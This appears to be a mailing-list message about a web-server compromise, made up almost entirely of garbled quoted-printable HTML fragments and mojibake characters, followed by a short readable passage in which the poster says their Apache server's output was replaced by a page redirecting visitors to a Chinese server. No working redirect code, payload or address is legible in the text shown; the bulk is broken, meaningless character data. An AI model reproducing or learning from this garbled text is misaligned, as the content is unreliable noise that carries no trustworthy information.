@/ ";">ââ¨ ly: Courier;">Â d8R:%4F} ily: "Times New Roman";">Ð 0pt; font-family: Courier;">,L6 family: "Times New Roman";">Ð¬ : 10pt; font-family: Courier;"> -family: "Times New Roman";">Ð e: 10pt; font-family: Courier;">n t-family: "Times New Roman";">Ð²Ð¢â=9C tyle=3D"font-size: 10pt; font-family: Courier;"> S $. font-size: 10pt; font-family: "Times New Roman";">Ð¼ pan style=3D"font-size: 10pt; font-family: Courier;">O(0 =3D"font-size: 10pt; font-family: "Times New Roman";">â=8C=
Ðph n> ">ââ¤ rier;">
Â \ Roman";">Ðâ=A4 mily: Courier;">lâ=96 4#Â· ont-family: "Times New Roman";">Ð£ size: 10pt; font-family: Courier;">'C.3 10pt; font-family: "Times New Roman";">â=A4 le=3D"font-size: 10pt; font-family: Courier;">Â Â Â =C2=
Â=A0 Times New Roman";">Ð° amily: Courier;">MU" : "Times New Roman";">âÐ=84 ize: 10pt; font-family: Courier;"># ont-family: "Times New Roman";">ÐÐ "font-size: 10pt; font-family: Courier;">8 10pt; font-family: "Times New Roman";">â=92 e=3D"font-size: 10pt; font-family: Courier;">9 ze: 10pt; font-family: "Times New Roman";">Ð¥ââ=95=
=A6> > >ÐÑ=
FG ";">Ñ ">& T w Roman";">â=AA : Courier;">j s New Roman";">âÑ=81 ont-family: Courier;">Â Â·~ FZâ=99d -size: 10pt; font-family: "Menlo Regular";">ï¿=BD style=3D"font-size: 10pt; font-family: Courier;">0KJ. "font-size: 10pt; font-family: "Times New Roman";">Ñ<=
span style=3D"font-size: 10pt; font-family: Courier;">Â Â =C2=
Â Â=A0 bE : "Times New Roman";">âÐ¹Ñââ=BC an>gÂ =C2=
Â Â Â=A0 mily: "Times New Roman";">Ñ 10pt; font-family: Courier;">8. family: "Times New Roman";">âÐ½ÑÐ³â´=
Ð³â=A5 "> n";">â¤Ñ=89 : Courier;">9Mx mes New Roman";">Ð¢ ily: Courier;">0Y Times New Roman";">Ð amily: Courier;">Y ;Times New Roman";">ÐâÑ=82 ze: 10pt; font-family: Courier;">4 nt-family: "Times New Roman";">Ðµ ize: 10pt; font-family: Courier;">" 0pt; font-family: "Times New Roman";">Ð "font-size: 10pt; font-family: Courier;">93 10pt; font-family: "Times New Roman";">Ð®â«ÐµÐ=
=B7%g<=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ð¼d > >Ð ii( span> t;;">â=91 >8 n";">Ð ;">3% man";">â´Ð=93 ly: Courier;">CTE ;Times New Roman";">ÐºÐ font-family: Courier;">x : "Times New Roman";">â=80 0pt; font-family: Courier;">t mily: "Times New Roman";">â=AB e: 10pt; font-family: Courier;">o H font-family: "Times New Roman";">ÑâÐ=96 n style=3D"font-size: 10pt; font-family: Courier;">!- "font-size: 10pt; font-family: "Times New Roman";">Ð¤<=
span style=3D"font-size: 10pt; font-family: Courier;">^Â =
A quot;;">â=98 r;"># man";">Ðâ=95 ly: Courier;"> tI9k t;Times New Roman";">Ðâ=92 0pt; font-family: Courier;">UN amily: "Times New Roman";">â=91 ze: 10pt; font-family: Courier;">m~ ont-family: "Times New Roman";">â©Ð=97 =3D"font-size: 10pt; font-family: Courier;">;? ize: 10pt; font-family: "Times New Roman";">Ð yle=3D"font-size: 10pt; font-family: Courier;">v \ t-size: 10pt; font-family: "Times New Roman";">â=9A pan style=3D"font-size: 10pt; font-family: Courier;"> "font-size: 10pt; font-family: "Times New Roman";">â=9F n>8K le=3D"font-size: 10pt; font-family: "Times New Roman";">â=90=
Ñb > >Ð¤7 n> ">Ð°5C4 span> t;;">ââ£ Courier;">^ New Roman";">â=93 ly: Courier;">z3x Times New Roman";">âÐ=9F t; font-family: Courier;">O_Ncâ=99 t; font-family: "Times New Roman";">ÐÐ¬Ð® n style=3D"font-size: 10pt; font-family: Courier;">^ ont-size: 10pt; font-family: "Times New Roman";">âÑ=88<=
/span>d style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
=A7â=96<=
/span> ot;;">Ða=
W^|x an";">Ð¯Ð¿â¼ÐÑ=8F : 10pt; font-family: Courier;">I2` nt-family: "Times New Roman";">âââ=B4=
now e=3D"font-size: 10pt; font-family: "Times New Roman";">Ñ=E2=
( > >âââÑÑ=8F pt; font-family: Courier;">$ ily: "Times New Roman";">â=94 : 10pt; font-family: Courier;">^ t-family: "Times New Roman";">Ñ ze: 10pt; font-family: Courier;"> nt-family: "Times New Roman";">â=A2 t-size: 10pt; font-family: Courier;">â=9A ze: 10pt; font-family: "Times New Roman";">âÐ=92=
K =3D"font-size: 10pt; font-family: "Times New Roman";">Ð±=D0=
=96! pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
ââ£Ñ Courier;">8 New Roman";">ÐÐ·â=91 pt; font-family: Courier;">WY mily: "Times New Roman";">Ð¥Ð± size: 10pt; font-family: Courier;">SÂ =3D"font-size: 10pt; font-family: "Times New Roman";">â=BC=
ÐâÑ=8F urier;"> w Roman";">â=80 : Courier;">p s New Roman";">Ðµ y: Courier;">q es New Roman";">Ð· ly: Courier;"> mes New Roman";">Ð ily: Courier;">t imes New Roman";">ÑÐ ont-family: Courier;">P "Times New Roman";">Ð»Ð«Ñ size: 10pt; font-family: Courier;">0 font-family: "Times New Roman";">ÑÐ =3D"font-size: 10pt; font-family: Courier;">â=99ha :"V an style=3D"font-size: 10pt; font-family: "Times New Roman";">=D1=
Ð³â er;">i Roman";">â=96 Courier;">Z@Â Y t;Times New Roman";">Ñâ Ð=95 ize: 10pt; font-family: Courier;">Y, font-family: "Times New Roman";">Ð -size: 10pt; font-family: Courier;">`- FE4 10pt; font-family: "Times New Roman";">Ð® =3D"font-size: 10pt; font-family: Courier;">a. ize: 10pt; font-family: "Times New Roman";">Ñ yle=3D"font-size: 10pt; font-family: Courier;"> size: 10pt; font-family: "Times New Roman";">Ð tyle=3D"font-size: 10pt; font-family: Courier;">v0 t-size: 10pt; font-family: "Times New Roman";">Ð¸ style=3D"font-size: 10pt; font-family: Courier;">Â n> ">Ð ^ pan> ;;">ÐdT<=
/span> ot;;">ÑÑâ ly: Courier;">A mes New Roman";">â family: Courier;">>t "Times New Roman";">â¨â¡â=98 =3D"font-size: 10pt; font-family: Courier;">Â n style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
©Ðâ©Ð³âÑâ size: 10pt; font-family: Courier;">W } ; font-family: "Times New Roman";">Ñ nt-size: 10pt; font-family: Courier;">+ t; font-family: "Times New Roman";">â=93 =3D"font-size: 10pt; font-family: Courier;"> fUX size: 10pt; font-family: "Times New Roman";">ÐÑ<=
span style=3D"font-size: 10pt; font-family: Courier;">sÂ =
-w ";">Ð² ">R F man";">â=91 urier;">â=99 Times New Roman";">Ðâ=95 t; font-family: Courier;">5 ly: "Times New Roman";">â=90 10pt; font-family: Courier;">d -family: "Times New Roman";">âÐ§ââ=92 pan>

Â

Â

~ ";">Ñ ">Y an";">Ð²Ð¢ Courier;"> New Roman";">Ð° Courier;">Y tlk imes New Roman";">Ð°ÑÐ¾Ð ize: 10pt; font-family: Courier;">`â=9A- e: 10pt; font-family: "Times New Roman";">â=84 tyle=3D"font-size: 10pt; font-family: Courier;"> -size: 10pt; font-family: "Times New Roman";">â=BC an style=3D"font-size: 10pt; font-family: Courier;">m font-size: 10pt; font-family: "Times New Roman";">ÑÐ=E2=
. n> ">â=88 pan>Â Â
Roman";">â£Ð½âÐâ=A0 font-size: 10pt; font-family: Courier;">{ 10pt; font-family: "Times New Roman";">Ñ =3D"font-size: 10pt; font-family: Courier;">? e: 10pt; font-family: "Times New Roman";">Ñ e=3D"font-size: 10pt; font-family: Courier;">Â u pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ñ4d n> ">ââ¤ rier;">J Roman";">Ðâ=95 amily: Courier;">. ;Times New Roman";">ÑâÑ=89 ze: 10pt; font-family: Courier;">+rqy~ ; font-family: "Times New Roman";">ÐÑÑââ=
ââ Courier;">mÂ -family: "Times New Roman";">â£Ð "font-size: 10pt; font-family: Courier;">*
35ez an";">â=A9 rier;">a Roman";">âÐºÑÐ¿Ñ=85 size: 10pt; font-family: Courier;">{ font-family: "Times New Roman";">Ñ -size: 10pt; font-family: Courier;">#e ; font-family: "Times New Roman";">Ñ nt-size: 10pt; font-family: Courier;">: t; font-family: "Times New Roman";">Ñ ont-size: 10pt; font-family: Courier;">>_ : 10pt; font-family: "Times New Roman";">â´ÐÑ=8A pan>xÂ span>1Â°/ s New Roman";">Ð» y: Courier;">1xQ imes New Roman";">Ñâ=95 ; font-family: Courier;"> y: "Times New Roman";">âÐ²Ð£Ð=B6 yle=3D"font-size: 10pt; font-family: Courier;">E size: 10pt; font-family: "Times New Roman";">Ð¤ tyle=3D"font-size: 10pt; font-family: Courier;">,".` =3D"font-size: 10pt; font-family: "Times New Roman";">Ð½=E2=
Ð³\=
uot;;">âÐ½Ð=BC ily: Courier;">a E'Y "Times New Roman";">ÐÐ¾Ð«ââ<=
span style=3D"font-size: 10pt; font-family: Courier;">

..Z ";">Ñ "> n";">Ð ;">: an";">Ñ r;">l. oman";">Ðâ=90 ily: Courier;">{ imes New Roman";">ââÑÐ½ font-size: 10pt; font-family: Courier;">` 0pt; font-family: "Times New Roman";">Ñ "font-size: 10pt; font-family: Courier;">R 10pt; font-family: "Times New Roman";">Ð =3D"font-size: 10pt; font-family: Courier;"> e: 10pt; font-family: "Times New Roman";">âÐ<=
span style=3D"font-size: 10pt; font-family: Courier;"> Â°K style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
=A9t pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
â Ð¹Ñ=88 urier;">$hH New Roman";">âââ=91 ze: 10pt; font-family: Courier;">Â - "font-size: 10pt; font-family: "Times New Roman";">Ð´â=
Ð=AA,i span> t;;">âÐ=A2 rier;">v Roman";">Ð urier;"> Â¤ mes New Roman";">â=A1 family: Courier;">"H y: "Times New Roman";">Ð¿Ñ e: 10pt; font-family: Courier;">Â¤ ; font-family: "Times New Roman";">Ð nt-size: 10pt; font-family: Courier;">âÂ° L =3D"font-size: 10pt; font-family: "Times New Roman";">â=96 span>W0 style=3D"font-size: 10pt; font-family: "Times New Roman";">Ð=
sc n style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
´ u R% span> t;;">Ñ4<=
/span> ot;;">â=AA ">Yf an";">â=9C rier;">5 Roman";">â¬âÐ®Ð¢ e: 10pt; font-family: Courier;">,(+y font-family: "Times New Roman";">Ñ -size: 10pt; font-family: Courier;">: font-family: "Times New Roman";">ÐÐ =3D"font-size: 10pt; font-family: Courier;"> e: 10pt; font-family: "Times New Roman";">Ñ e=3D"font-size: 10pt; font-family: Courier;">% ze: 10pt; font-family: "Times New Roman";">ââ=D1=
=89]wR%1 n> ">Ñâ¬Ð=95 Courier;">.r New Roman";">â=9E ily: Courier;"> imes New Roman";">Ñâ=96 ; font-family: Courier;">Â YRâ=99<}
uot;;">â=88 ;"> an";">Ñ r;"> man";">ÐâÐ´â¥ 10pt; font-family: Courier;">-q -family: "Times New Roman";">â=96 size: 10pt; font-family: Courier;">_ font-family: "Times New Roman";">â©â¬ tyle=3D"font-size: 10pt; font-family: Courier;">{2Y nt-size: 10pt; font-family: "Times New Roman";">ÑÑ=E2=
â=94 "> n";">â´â¤ÑÑÐ ze: 10pt; font-family: Courier;">A+Q font-family: "Times New Roman";">âââÐ=
=A7Â° an> ;">â=90{=
uot;;">ÐâÑÐ=9F nt-family: Courier;">

Â

w quot;;">Ð¨ >A ";">â¼â£âÑ=8E 10pt; font-family: Courier;">4R family: "Times New Roman";">Ñ : 10pt; font-family: Courier;">s -family: "Times New Roman";">â=A0 size: 10pt; font-family: Courier;">F font-family: "Times New Roman";">Ð·â â£<=
span style=3D"font-size: 10pt; font-family: Courier;">{ =3D"font-size: 10pt; font-family: "Times New Roman";">â=99 span> k style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
Ð¹Ñâ Courier;">8 New Roman";">ââ font-family: Courier;"> : "Times New Roman";">â â¢Ð«Ðâ=9C an># le=3D"font-size: 10pt; font-family: "Times New Roman";">Ð=D0=
½ÐÑ=8F ">â=96~ o es New Roman";">ââ£Ð«Ð¤Ð° =3D"font-size: 10pt; font-family: Courier;"> &28

^ quot;;">â=AB r;">@O} Roman";">Ñ rier;">: Roman";">â=A8 Courier;">f -A mes New Roman";">Ð¿ÐµÐª pt; font-family: Courier;">Â Â Â Â Â an> ;">Ð¦Ð "> n";">Ð®â=98 : Courier;">k s New Roman";">â=9A mily: Courier;"> Times New Roman";">Ð¿Ðâ=84 e: 10pt; font-family: Courier;">{ t-family: "Times New Roman";">Ñ ze: 10pt; font-family: Courier;">Â· t; font-family: "Times New Roman";">â=9C =3D"font-size: 10pt; font-family: Courier;">/ e: 10pt; font-family: "Times New Roman";">â=96 tyle=3D"font-size: 10pt; font-family: Courier;">U -size: 10pt; font-family: "Times New Roman";">ÑÐ«=
q$a e=3D"font-size: 10pt; font-family: "Times New Roman";">Ð¹=D0=
ºâx=
uot;;">ÐÑÑ : Courier;">| s New Roman";">â=90 mily: Courier;"> 5Â 1 t; font-family: "Times New Roman";">â=84 =3D"font-size: 10pt; font-family: Courier;"> e: 10pt; font-family: "Times New Roman";">Ð e=3D"font-size: 10pt; font-family: Courier;"> ze: 10pt; font-family: "Times New Roman";">Ð¯ÑÑ=D1=
=86|=C2=
=A0 New Roman";">â=80 ly: Courier;">w mes New Roman";">â=84 family: Courier;">o t;Times New Roman";">Ñ -family: Courier;"> 4 uot;Times New Roman";">ÑÐ½ pt; font-family: Courier;">c ily: "Menlo Regular";">ï¿=BD 10pt; font-family: "Times New Roman";">â=9F e=3D"font-size: 10pt; font-family: Courier;">? ze: 10pt; font-family: "Times New Roman";">â=9E style=3D"font-size: 10pt; font-family: Courier;">dLM# font-size: 10pt; font-family: "Times New Roman";">Ð³ pan style=3D"font-size: 10pt; font-family: Courier;">x "font-size: 10pt; font-family: "Times New Roman";">â=96 n>l e=3D"font-size: 10pt; font-family: "Times New Roman";">â=90=
â=90J pan> ;;">ââÐ° ily: Courier;">J imes New Roman";">Ð« mily: Courier;">a

uot;;">â=99 ;">v* man";">ÑÑ Courier;">8x~v mes New Roman";">ÑÑÑ pt; font-family: Courier;">ow+v family: "Times New Roman";">â=A8 ize: 10pt; font-family: Courier;">\ font-family: "Times New Roman";">Ð -size: 10pt; font-family: Courier;"> font-family: "Times New Roman";">â=A5 font-size: 10pt; font-family: Courier;">dJ!Â style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
Â·<=
/span> ot;;">â=A0 ">_, an";">Ðªâ«Ð¨ÑÐ° : 10pt; font-family: Courier;"> -family: "Times New Roman";">â=9A size: 10pt; font-family: Courier;">K font-family: "Times New Roman";">ÑÐ¤ =3D"font-size: 10pt; font-family: Courier;"> e: 10pt; font-family: "Times New Roman";">Ð e=3D"font-size: 10pt; font-family: Courier;"> ze: 10pt; font-family: "Times New Roman";">Ñ le=3D"font-size: 10pt; font-family: Courier;">* ize: 10pt; font-family: "Times New Roman";">Ñ yle=3D"font-size: 10pt; font-family: Courier;">Y size: 10pt; font-family: "Times New Roman";">â¤â¢ span> r style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
¼Ð=BC1 pan> ;;">Ð¡4 span> t;;">Ð8&=
lt; n";">â=97 ier;">ka Roman";">Ðâ=88 amily: Courier;">C ;Times New Roman";">ÐÑÐ§Ðââ«Ð³ span>G tyle=3D"font-size: 10pt; font-family: "Times New Roman";">Ñ=
Ñâ¤â Courier;">âÂ=B7"O nt-family: "Times New Roman";">Ð§â=A4 =3D"font-size: 10pt; font-family: Courier;"> e: 10pt; font-family: "Times New Roman";">âÑ=97<=
span style=3D"font-size: 10pt; font-family: Courier;"> R_â=9AY<=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ð .&
|Â uot;Times New Roman";">ÐÐ¶ pt; font-family: Courier;">tX mily: "Times New Roman";">Ð 10pt; font-family: Courier;">HÂ° font-family: "Times New Roman";">â¤â¤ tyle=3D"font-size: 10pt; font-family: Courier;">Â¤ "font-size: 10pt; font-family: "Times New Roman";">ÐÐ=
ÐD > >ââÐ : Courier;"> s New Roman";">Ñâ=95 ont-family: Courier;">r Â¤

Â

KV$ n";">Ð§ ;">Â Â Â Â Â ize: 10pt; font-family: "Times New Roman";">âÐ¨Ð=BB=
W style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
=9D'8z pan> ;;">âÐ â ily: Courier;"> imes New Roman";">Ð mily: Courier;">k Times New Roman";">â=9B t-family: Courier;">YEx "Times New Roman";">âÑ=85 e: 10pt; font-family: Courier;">upDBR font-family: "Times New Roman";">Ð³Ð =3D"font-size: 10pt; font-family: Courier;">4 e: 10pt; font-family: "Times New Roman";">Ð³ e=3D"font-size: 10pt; font-family: Courier;">I ze: 10pt; font-family: "Times New Roman";">Ð¼Ñ an style=3D"font-size: 10pt; font-family: Courier;">42p$ =3D"font-size: 10pt; font-family: "Times New Roman";">â=A2=
Ð£ > >ÐÐ=
quot;;">Ñ >Â¤f Roman";">â=A6 Courier;"> >
uot;;">Ð=
?>Â
Roman";">Ñ rier;">'ci mes New Roman";">Ð²â=AB font-family: Courier;">i : "Menlo Regular";">ï¿=BD t; font-family: "Times New Roman";">ÐÐ¹Ð n style=3D"font-size: 10pt; font-family: Courier;">a ont-size: 10pt; font-family: "Times New Roman";">Ñ an style=3D"font-size: 10pt; font-family: Courier;"> ~ "font-size: 10pt; font-family: "Times New Roman";">Ð<=
span style=3D"font-size: 10pt; font-family: Courier;">V =3D"font-size: 10pt; font-family: "Times New Roman";">Ð¢ n>M e=3D"font-size: 10pt; font-family: "Times New Roman";">Ð an>0 le=3D"font-size: 10pt; font-family: "Times New Roman";">â=A9=
ââ¥â=98 ly: Courier;"> ** Times New Roman";">Ñ amily: Courier;">A ;Times New Roman";">â=9E nt-family: Courier;"> quot;Times New Roman";">Ð£â=91 : 10pt; font-family: Courier;"> #mgDS. ; font-family: "Times New Roman";">Ñ nt-size: 10pt; font-family: Courier;">â=9A v -size: 10pt; font-family: "Times New Roman";">Ð¾ style=3D"font-size: 10pt; font-family: Courier;"> 2 nt-size: 10pt; font-family: "Times New Roman";">Ð±Ð· n>X" n style=3D"font-size: 10pt; font-family: "Times New Roman";">=D0=
¬â¥ÐÐ° Courier;">N + es New Roman";">Ð±Ð t-family: Courier;">>â=99 t-family: "Times New Roman";">Ð±Ñ ont-size: 10pt; font-family: Courier;">~ 0pt; font-family: "Times New Roman";">Ð "font-size: 10pt; font-family: Courier;">; 10pt; font-family: "Times New Roman";">Ñ =3D"font-size: 10pt; font-family: Courier;">LÂ O pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ñ> pan> ;;">Ð¡p span> t;;">âÐµÑÐ=90 -family: Courier;">8< "Times New Roman";">Ð¼ÐÑÐ£â=A0 n style=3D"font-size: 10pt; font-family: Courier;"> ont-size: 10pt; font-family: "Times New Roman";">â=97=
=3D"font-size: 10pt; font-family: "Times New Roman";">Ð=D1=
=8Fn pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ñ|< span> t;;">â¨Ð=B4 rier;">_ Roman";">Ð£â=88 amily: Courier;">w? t;Times New Roman";">â§Ñ=8C 0pt; font-family: Courier;">:Y
â=99l- New Roman";">Ð Courier;"> New Roman";">Ð¸ : Courier;">SF es New Roman";">â¡Ð=A8 font-family: Courier;">
fa,VW man";">ÑÐ Courier;">ZW s New Roman";">Ð y: Courier;">Â¤ t;Times New Roman";">Ð¬Ð ; font-family: Courier;">. y: "Times New Roman";">ÑÐ¬ e: 10pt; font-family: Courier;">Â°] t; font-family: "Times New Roman";">Ð¥ ont-size: 10pt; font-family: Courier;"> pt; font-family: "Times New Roman";">âÑÑÐ=9C=
â=9C

Â

uot;;">Ð±Ð¸â=9D ily: Courier;">9 imes New Roman";">ÑÐ¹ ont-family: Courier;">+ "Times New Roman";">â t; font-family: Courier;">BÂ
A& es New Roman";">â=94 amily: Courier;">- ;Times New Roman";">Ð§ family: Courier;">n t;Times New Roman";">Ð´ -family: Courier;">UX uot;Times New Roman";">â=92 font-family: Courier;">uu ly: "Times New Roman";">Ð² pt; font-family: Courier;">F mily: "Times New Roman";">Ð 10pt; font-family: Courier;"> )Od t-family: "Times New Roman";">Ñ ze: 10pt; font-family: Courier;">

oman";">Ñ ier;"> b6 w Roman";">Ð© ourier;"> ew Roman";">Ð¥ Courier;">kBy s New Roman";">ÐÐ -family: Courier;">V! uot;Times New Roman";">âÐ=A4 10pt; font-family: Courier;">' ont-family: "Times New Roman";">â=A0 nt-size: 10pt; font-family: Courier;">!D pt; font-family: "Times New Roman";">â=91 =3D"font-size: 10pt; font-family: Courier;">U e: 10pt; font-family: "Times New Roman";">Ð¡ e=3D"font-size: 10pt; font-family: Courier;">LA size: 10pt; font-family: "Times New Roman";">âÐ=A5 n>/% le=3D"font-size: 10pt; font-family: "Times New Roman";">Ð=D1=
Ñ=87(d span> t;;">â âÐ mily: Courier;">x6 ;Times New Roman";">Ñ family: Courier;">; t;Times New Roman";">ÐÐ§Ðº : 10pt; font-family: Courier;">H -family: "Times New Roman";">Ð¹ e: 10pt; font-family: Courier;"> s nt-family: "Times New Roman";">â=A3 t-size: 10pt; font-family: Courier;">Ozn pt; font-family: "Times New Roman";">Ðâ=9C style=3D"font-size: 10pt; font-family: Courier;">H t-size: 10pt; font-family: "Times New Roman";">Ð£ÐÑ=
style=3D"font-size: 10pt; font-family: "Times New Roman";">=E2=
ªâ=A4 ">L S man";">ÐÐ Courier;">(Â Â Â Â Â =3D"font-size: 10pt; font-family: "Times New Roman";">Ð¼=D0=
=BC& n> ">â=97Z3=
NvJ n";">â=A3 ier;">p Roman";">Ñ urier;">h w Roman";">â=96 : Courier;">w s New Roman";">â mily: Courier;">] ;Times New Roman";">â=A6

Â t;Times New Roman";">Ð¡ââ´ t-size: 10pt; font-family: Courier;">â=96 ze: 10pt; font-family: "Times New Roman";">â=90 style=3D"font-size: 10pt; font-family: Courier;">Â i =3D"font-size: 10pt; font-family: "Times New Roman";">Ñ=D1=
Ð=90m 4<=
/span> ot;;">â=80 ">7 n";">Ñ ;">b an";">Ðµ r;">zq oman";">â=91 ourier;">h ew Roman";">ÐÐ¤Ðâ¤â font-size: 10pt; font-family: Courier;">N& ze: 10pt; font-family: "Times New Roman";">â=94 style=3D"font-size: 10pt; font-family: Courier;">-

Â *X;T "Times New Roman";">ÑÐÐ¡ size: 10pt; font-family: Courier;">D font-family: "Times New Roman";">Ñ -size: 10pt; font-family: Courier;">{. ; font-family: "Times New Roman";">â=A3 "font-size: 10pt; font-family: Courier;">X 10pt; font-family: "Times New Roman";">âÐ¶Ð=9A n>Y e=3D"font-size: 10pt; font-family: "Times New Roman";">â=93=
Ñ nbgl span> t;;">â¦â Courier;">E New Roman";">â=82 ly: Courier;">$S Times New Roman";">Ð£âÐÑ=80 nt-size: 10pt; font-family: Courier;"> qÂ Â Â Â =C2=
=A0 K# s New Roman";">Ð y: Courier;">3F mes New Roman";">Ð± ily: Courier;">: imes New Roman";">â=9A -family: Courier;">Â·1Â ze: 10pt; font-family: "Times New Roman";">Ð le=3D"font-size: 10pt; font-family: Courier;"> ize: 10pt; font-family: "Times New Roman";">Ñ yle=3D"font-size: 10pt; font-family: Courier;">q size: 10pt; font-family: "Times New Roman";">Ð¾ tyle=3D"font-size: 10pt; font-family: Courier;">] -size: 10pt; font-family: "Times New Roman";">Ðâ=88 an>r le=3D"font-size: 10pt; font-family: "Times New Roman";">Ð pan> n: style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
Ðâ¨ er;"> oman";">Ð«âÐ=95 nt-family: Courier;">; quot;Times New Roman";">Ð ont-family: Courier;">z "Times New Roman";">â=A6 t; font-family: Courier;">0 ly: "Times New Roman";">ââ© ont-size: 10pt; font-family: Courier;">5 pt; font-family: "Times New Roman";">Ð¡â¤Ðâ=95=
=A4R pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
â=9C n>Â Â Â Â Â pt; font-family: "Times New Roman";">Ð« font-size: 10pt; font-family: Courier;">r

uot;;">âÐ=AF ourier;">yy4 New Roman";">â=82 ily: Courier;"> imes New Roman";">â -family: Courier;">> "Times New Roman";">âÐÐ=9D nt-size: 10pt; font-family: Courier;">) t; font-family: "Times New Roman";">â=9F =3D"font-size: 10pt; font-family: Courier;">{ e: 10pt; font-family: "Times New Roman";">ÐÐ© n style=3D"font-size: 10pt; font-family: Courier;">( ont-size: 10pt; font-family: "Times New Roman";">Ñ an style=3D"font-size: 10pt; font-family: Courier;">4 font-size: 10pt; font-family: "Times New Roman";">ââ=95=
=A8=C2=
Â=A0 Times New Roman";">Ñ amily: Courier;"> ;Times New Roman";">â=A0 nt-family: Courier;"> quot;Times New Roman";">Ð£ ont-family: Courier;"> | "Times New Roman";">Ð font-family: Courier;">Y8Â°y t-family: "Times New Roman";">â=96 -size: 10pt; font-family: Courier;">z font-family: "Times New Roman";">Ðâ=80 le=3D"font-size: 10pt; font-family: Courier;">@$D sâ=96 yle=3D"font-size: 10pt; font-family: "Times New Roman";">â=
Ð=B9b pan> ;;">âÐ=B6 ier;">1 Roman";">ÐÐ¿Ñââ¦Ð =3D"font-size: 10pt; font-family: Courier;">Pq_â=99 =3D"font-size: 10pt; font-family: "Times New Roman";">Ð£=D0=
=BD8q =
=
â=92j span> t;;">ââ¢ Courier;">B New Roman";">â=91 ly: Courier;">Â nt-family: "Times New Roman";">â¡Ñ=8C =3D"font-size: 10pt; font-family: Courier;">< -size: 10pt; font-family: "Times New Roman";">âªÑ=8D an>* le=3D"font-size: 10pt; font-family: "Times New Roman";">Ð«=D0=
Ð=91e span> t;;">ÐkT=
| quot;;">âÑ=8D Courier;"> - New Roman";">Ð : "Menlo Regular";">ï¿=BD t; font-family: "Times New Roman";">â=B4 =3D"font-size: 10pt; font-family: Courier;">Z ze: 10pt; font-family: "Times New Roman";">ââ«=E2=
â=84 ">=3D 4 Roman";">â=90 Courier;">Q New Roman";">ââ font-family: Courier;">@ "Times New Roman";">Ðâ=98 ze: 10pt; font-family: Courier;"> nt-family: "Times New Roman";">âÐ=AE =3D"font-size: 10pt; font-family: Courier;">" t-size: 10pt; font-family: "Times New Roman";">ÐÐâ=
=BCLx<=
span style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ð¦A > >âªÐµâÐ½ family: Courier;"> t;Times New Roman";">ÑÐ¼Ð : 10pt; font-family: Courier;">Y t-family: "Times New Roman";">Ñ ze: 10pt; font-family: Courier;">J nt-family: "Times New Roman";">Ñâ¢ÐªÐâ=95=
=93 pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
ââ¥Ñâ=9B t-family: Courier;">Â° y: "Times New Roman";">Ð¼ÑÐÑâ¥â=
>nG~CH(d&q=
uot; an";">âÐ=93 y: Courier;">c es New Roman";">ÐÐ Ðµ t; font-family: Courier;">Â¤â=96aÂ style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
â<=
span>Â 69 uot;Times New Roman";">â=96 font-family: Courier;"> Â -family: "Times New Roman";">Ð e: 10pt; font-family: Courier;">oX;w font-family: "Times New Roman";">Ñ -size: 10pt; font-family: Courier;"> font-family: "Times New Roman";">Ñ t-size: 10pt; font-family: Courier;">l ; font-family: "Times New Roman";">Ñâ=A1 yle=3D"font-size: 10pt; font-family: Courier;">sÂ Â
Y Roman";">Ð urier;">L w Roman";">Ð¨ ourier;">@Â Â
Roman";">â=97 Courier;"> â=9ACÂ Z ily: "Times New Roman";">Ñ 0pt; font-family: Courier;"> mily: "Times New Roman";">Ñ 10pt; font-family: Courier;">"Â° 0pt; font-family: "Times New Roman";">ÐÐ yle=3D"font-size: 10pt; font-family: Courier;">Pc -size: 10pt; font-family: "Times New Roman";">Ð§ style=3D"font-size: 10pt; font-family: Courier;">a)g ont-size: 10pt; font-family: "Times New Roman";">Ð£ an style=3D"font-size: 10pt; font-family: Courier;">e font-size: 10pt; font-family: "Times New Roman";">ÑÐ´ pan>4NH style=3D"font-size: 10pt; font-family: "Times New Roman";">â=
=90=C2=
=A0 / New Roman";">â=90 ily: Courier;">!c Times New Roman";">Ð¡ÐÐµÐ â=A4 =3D"font-size: 10pt; font-family: Courier;"> e: 10pt; font-family: "Times New Roman";">Ð¹âÐ=B3=
Ð¤C > >Ñ .9+ span> t;;">ÑÐ«ââª ont-family: Courier;">Â Â Â Â Â pan style=3D"font-size: 10pt; font-family: "Times New Roman";">=
Ñ5X an> ;">Ñ
6< man";">Ñââ¼ font-family: "Menlo Regular";">ï¿=BD t-size: 10pt; font-family: "Times New Roman";">Ðª style=3D"font-size: 10pt; font-family: Courier;">$ nt-size: 10pt; font-family: "Times New Roman";">â¨Ñ=82=
â¥âÐÐ¡Ðâ=A5 e: 10pt; font-family: Courier;"> â=96u 10pt; font-family: "Times New Roman";">â=9E le=3D"font-size: 10pt; font-family: Courier;">a ize: 10pt; font-family: "Times New Roman";">Ð yle=3D"font-size: 10pt; font-family: Courier;">t size: 10pt; font-family: "Times New Roman";">ÐÐ¥<=
span style=3D"font-size: 10pt; font-family: Courier;">^ =3D"font-size: 10pt; font-family: "Times New Roman";">Ð n>W?K yle=3D"font-size: 10pt; font-family: "Times New Roman";">Ñ=
â=962 span> t;;">Ð¹Ð¼Ð£Ñâ=93 ; font-family: Courier;">4 y: "Times New Roman";">Ð t; font-family: Courier;"> E

>==================

The address indicated in the begining of the page code leads to some chines=
e
server.
t; font-family: Times;">
tyle=3D"font-size: 10pt; font-family: Times;">
So, somehow it happened that the output of the apache server was substitute=
d by
this page, which redirected visitors to some chinese server. tyle=3D"font-size: 10pt; font-family: Times;">It is the second
time I am posting to the mailing list, the first time the mailing list
